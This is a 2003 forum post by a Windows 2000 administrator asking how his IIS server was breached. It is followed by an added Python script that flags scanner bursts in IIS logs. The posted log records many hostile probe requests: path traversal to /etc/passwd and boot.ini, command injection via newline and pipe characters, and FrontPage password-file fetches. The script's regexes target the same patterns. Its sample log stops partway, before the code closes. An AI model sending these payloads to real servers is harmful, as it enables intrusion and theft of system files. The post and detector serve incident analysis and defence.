- I was hacked
- Posted by Frank on August 3rd, 2003
I have a Windows 2000 server that is current w/ the latest patches from MS.
It is running an IIS server that is configured w/ Microsoft's URLScan tool.
It is also running Terminal Services w/ 128 bit encryption turned on. I
have a firewall configured to allow only inbound/outbound HTTP traffic on
port 80 and Terminal Services. I'm also running Snort as an IDS, a virus
scanner that updates/scans nightly. I have Windows security auditing turned
on. I've also hardened the system by turning off all unnecessary services
and making all the appropriate registry changes to restrict access (e.g.
disabling anonymous access).
Sounds somewhat secure, right?
Last night I was hacked. I'm still trying to sort out what happened. I saw
a series of attempts to attack IIS that the IIS log claimed were coming from
itself. Unfortunately, my firewall was not logging HTTP traffic, although
I think I have the source IP via Snort. All these attacks failed. Next, I
saw a series of logon failures using Terminal Services. Again, all of these
failed. Then, a few minutes later, I mysteriously see a process called
A~NSISu_.exe. This seems to come out of nowhere. Prior to this I did not
see any cmd sessions or anything else that suggests the attacker
successfully breached my server.
Below is the web log followed by the event in the event viewer that showed
the first visible process of the attack. Following this, I saw a series of
processes start (cmd.exe, nbtstat, route).
I can take care of reinstalling and hardening my system. I have one primary
concern at this stage: understanding how they cracked my server. If you
have advice or suggestions, it would be appreciated.
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/*.idc 404 4184 21 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iisadmin/ - 404 4184 25 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr 404 4184 931 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/msadc/msadcs.dll - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/iisadmin/bdir.htr 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/query.idq 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/fastq.idq 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/exair/search/search.idq 404 4184 50 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/exair/search/query.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/prxdocs/misc/prxrch.idq 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qfullhit.htw 404 4184 143 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qsumrhit.htw 404 4184 143 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/abczxv.htw 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfcache.map - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/administrators.pwd - 403 4358 43 344 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/authors.pwd - 403 4358 36 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/users.pwd - 403 4358 34 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/service.pwd - 403 4358 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 POST
/_vti_bin/shtml.dll/_vti_rpc - 405 4230 368 15 10.2.2.50 MSFrontPage/4.0
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ - 404 4184 24 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/ - 401 4572 48 47 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/sh - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/csh - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ksh - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cmd.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/cmd.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cmd32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/cmd32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/perl.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/perl.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/newdsn.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/_vti_bin/fpcount.exe 404 4184 71 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/rightfax/fuwww.dll/ 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/issamples/query.asp - 403 4270 46 78 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/samples/search/queryhit.htm - 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/*+.pl - 401 4572 62 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/exair/search/advsearch.asp - 403 4270 53 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iisadmpwd/aexp3.htr 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/repost.asp - 403 4270 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ 404 4184 20 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/users/ 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/ 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/ 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/exair/howitworks/codebrws.asp - 403 4270 56 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/msadc/samples/selector/showcode.asp - 403 4270 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/index.htm PageServices 200 0 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/search - 404 4184 23 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/index.html+ - 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/rguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/rguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/wguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/wguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/get32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/alibaba.pl - 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/tst.bat 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-win/uploader.exe 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/FormHandler.cgi - 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/testcgi - 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/test-cgi/* * 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/test.cgi - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/enivron.pl - 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/environ.pl - 401 4572 68 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/server-info - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/server-status - 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/tcsh - 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cgitest.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/~root - 404 4184 21 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /~ftp -
404 4184 20 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/phf Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= 404 4184 80 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/count.cgi - 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/nph-test-cgi - 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/webdist.cgi - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/aglimpse.cgi - 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/campas %0acat%0a/etc/passwd%0a 404 4184 54 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/jj - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/formmail - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/formmail.pl - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/faxsurvey /bin/cat%20/etc/passwd 404 4184 56 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/view-source ../../../../../../../etc/passwd 404 4184 67 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/srchadm/webhits.exe 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/mkilog.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/mkplog.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/query mss=../../../../../../../etc/passwd 404 4184 65 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/htimage.exe 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/htimage.exe 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/robots.txt - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/echo.bat 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/hello.bat 404 4184 42 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/htsearch exclude=%60/etc/passwd%60 404 4184 58 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ezshopper/loadpage.cgi user_id=1&file=|cat%20/etc/passwd| 404 4184 81 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ezshopper/search.cgi user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 404 4184 127 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/names.nsf/ 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/catalog.nsf/ 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/log.nsf/ 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/domlog.nsf/ 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/domcfg.nsf/ 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/sojourn.cgi cat=../../../../../../../etc/passwd 404 4184 71 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/perlidlc.bat 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/windmail.exe 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_bin/shtml.dll - 403 4358 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/.htaccess - 404 4184 25 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/doctodep.btr - 403 4358 37 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/carbo.dll icatcommand=..\..\..\..\boot.ini&catalogname=catalog 404 4184 78 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfdocs/expeval/ExprCalc.cfm OpenFilePath=c:\boot.ini 404 4184 68 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfdocs/expeval/openfile.cfm - 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/pfdispaly.cgi '%0A/bin/uname%20-a|' 404 4184 59 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/MachineInfo - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/mylog.phtml screen=/etc/passwd 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/mlog.phtml screen=/etc/passwd 404 4184 45 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/wrap - 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/oasnetconf.exe 404 4184 72 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/oaskill.exe 404 4184 45 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-shl/win-c-sample.exe 404 4184 40 0 - -
Event Type: Success Audit
Event Source: Security
Event Category: Detailed Tracking
Event ID: 592
Date: 8/2/2003
Time: 2:50:28 AM
User: MYSERVER\MyAdmin
Computer: MYSERVER
Description:
A new process has been created:
New Process ID: 1764
Image File Name: \DOCUME~1\ADMINI~1\LOCALS~1\Temp\A~NSISu_.exe
Creator Process ID: 1916
User Name: MyAdmin
Domain: MYSERVER
Logon ID: (0x0,0xDE65)
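Reading the log Frank posted: every request lands in the same second, from one client address, nearly all of them answered with 404/403/401, and most of them UrlScan rejections of legacy ISAPI sample scripts, FrontPage password files and Unix CGI probes. That is the footprint of an automated vulnerability scanner, not of anything that gained access, and it is worth being able to pick such bursts out of a log automatically. The Python below is an added example, not code from anyone in this thread. It assumes the default W3C extended column order (the posted excerpt has no #Fields header) and uses arbitrary starting thresholds (10 distinct URIs within one second, 80% error responses); the sample lines are a constructed subset of the posted log plus one made-up ordinary hit from a second client, and the probe-pattern names are mine.

```python
import re
from collections import defaultdict

# Column order assumed for the post's log, which has no #Fields header.
# Columns after time-taken (protocol version, User-Agent, ...) are ignored.
FIELDS = ["date", "time", "c_ip", "user", "site", "computer", "s_ip", "port",
          "method", "uri", "query", "status", "sc_bytes", "cs_bytes", "time_taken"]
URLSCAN_MARKER = "/<Rejected-By-UrlScan>"

# Request shapes seen in the post that are rarely legitimate traffic to a
# production IIS box: legacy ISAPI sample extensions, FrontPage password
# files, Unix CGI probes, and traversal / /etc/passwd / boot.ini payloads.
PROBE_PATTERNS = {
    "legacy_isapi": re.compile(r"\.(idq|idc|htr|htw)$", re.I),
    "frontpage_pwd": re.compile(r"^/_vti_pvt/.*\.pwd$", re.I),
    "unix_cgi": re.compile(r"^/cgi-bin/", re.I),
    "traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd|boot\.ini", re.I),
}


def parse_iis_line(line):
    """Split one W3C extended log line into a dict; None for headers or junk."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Name the probe families a single request matches."""
    hits = set()
    target = rec["uri"]
    if target == URLSCAN_MARKER:
        hits.add("urlscan_rejected")
        target = rec["query"].lstrip("~")  # UrlScan puts the real path in cs-uri-query
    for name, pat in PROBE_PATTERNS.items():
        if pat.search(target) or pat.search(rec["query"]):
            hits.add(name)
    return hits


def find_scan_bursts(lines, min_distinct=10, min_error_ratio=0.8):
    """Bucket requests per (client IP, second) and flag scanner bursts:
    many distinct URIs inside one second, nearly all answered with errors."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_iis_line(line)
        if rec:
            buckets[(rec["c_ip"], rec["date"], rec["time"])].append(rec)
    reports = []
    for (c_ip, date, time), recs in sorted(buckets.items()):
        distinct = {(r["uri"], r["query"]) for r in recs}
        ratio = sum(r["status"] >= 400 for r in recs) / len(recs)
        families = set().union(*(classify(r) for r in recs))
        reports.append({
            "client": c_ip, "when": f"{date} {time}", "requests": len(recs),
            "distinct_uris": len(distinct), "error_ratio": round(ratio, 2),
            "urlscan_rejected": sum(r["uri"] == URLSCAN_MARKER for r in recs),
            "families": sorted(families),
            # c-ip equal to s-ip is what the post's author saw: the log blames
            # the server's own address (NAT, a proxy, or a local process).
            "self_sourced": c_ip == recs[0]["s_ip"],
            "flagged": len(distinct) >= min_distinct and ratio >= min_error_ratio,
        })
    return reports


# Constructed sample: eleven lines copied from the posted log plus one
# made-up ordinary page hit from another client a minute later.
SAMPLE_LOG = r"""
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/*.idc 404 4184 21 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /iisadmin/ - 404 4184 25 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /msadc/msadcs.dll - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/iisadmin/bdir.htr 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/issamples/query.idq 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/administrators.pwd - 403 4358 43 344 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/sh - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/cmd.exe 404 4184 34 0 - -
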